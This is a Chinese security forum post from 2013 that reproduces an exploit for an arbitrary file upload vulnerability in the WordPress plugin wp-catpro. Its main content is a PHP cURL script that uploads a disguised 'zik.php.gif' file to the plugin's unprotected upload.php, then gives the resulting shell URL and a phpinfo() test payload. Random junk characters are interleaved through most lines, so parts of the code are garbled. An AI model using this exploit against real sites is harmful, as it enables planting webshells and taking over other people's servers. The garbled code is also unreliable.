找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2076|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability) S( _6 d: C& e# T* Z
#-----------------------------------------------------------------------
) ~+ x% G+ K1 r" `" R+ f% I
2 z  j4 m& L7 b8 Q! B3 F作者  => Zikou-16. o; V2 O0 u  K& z1 @, g  D
邮箱 => zikou16x@gmail.com
+ U+ ]3 n& G6 ~测试系统 : Windows 7 , Backtrack 5r3
0 `1 M& v, C! f/ s- X7 w下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
" y: T, ~7 H5 j9 M! Y; {####
: [) u$ b; `! J 1 q8 s) ?) d5 V: c, B: c6 X
#=> Exploit 信息:
5 J6 ?; s. q# e$ x. g------------------$ K/ n8 {4 H( O# Q7 j: v, l
# 攻击者可以上传 file/shell.php.gif
7 {" O9 R! {8 Y. M# K4 G% T# ("jpg", "gif", "png")  // Allowed file extensions3 d* \' q7 \, b
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
  C" |. ~. J4 \2 y; l  P# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)) `5 b( E- o$ d& Y2 [& K. x+ S
------------------% j- o, r- Q, V6 V1 `  X# |
  L9 l( B" N! }: `4 k& H) v
#=> Exploit
( a  }- a4 C  n# j" m$ b-----------
  [. ~  ^9 a0 ]* _: u- l<?php
7 k; f) V$ i5 k$ ~$ H: S& g5 g' v4 [ 8 q5 y% _8 _/ o/ c7 n
$uploadfile="zik.php.gif";
( v) u- ]5 d% Z$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");2 V! r1 R4 q( L  q( Q3 c* h4 U
curl_setopt($ch, CURLOPT_POST, true);
- P- t8 l) c) ?curl_setopt($ch, CURLOPT_POSTFIELDS,$ @6 c: B. j3 P( P& b
array('Filedata'=>"@$uploadfile",
  v" y% J0 f  ?7 D+ ]'folder'=>'/wp-content/uploads/catpro/'));
9 v" g) i& U' c0 acurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2 v" T$ z" [- J, r$postResult = curl_exec($ch);' y5 i; o) A! d
curl_close($ch);
1 a  T/ g( f9 D2 ^+ d( U4 U8 X5 ` 1 k/ S$ e, n5 D3 _% X2 ]' i
print "$postResult";. `4 w% u0 `8 p0 I) j
! c; Q. ]2 K7 A! q7 C- H
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
, U9 T8 `3 J4 M  y. |  _* y1 K, w  ?>
& y/ ]2 G5 P4 e4 X<?php: [) e5 K# p! Z7 Y% h$ ^
phpinfo();
9 O, Y% s6 d6 o( {. {! s8 v?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表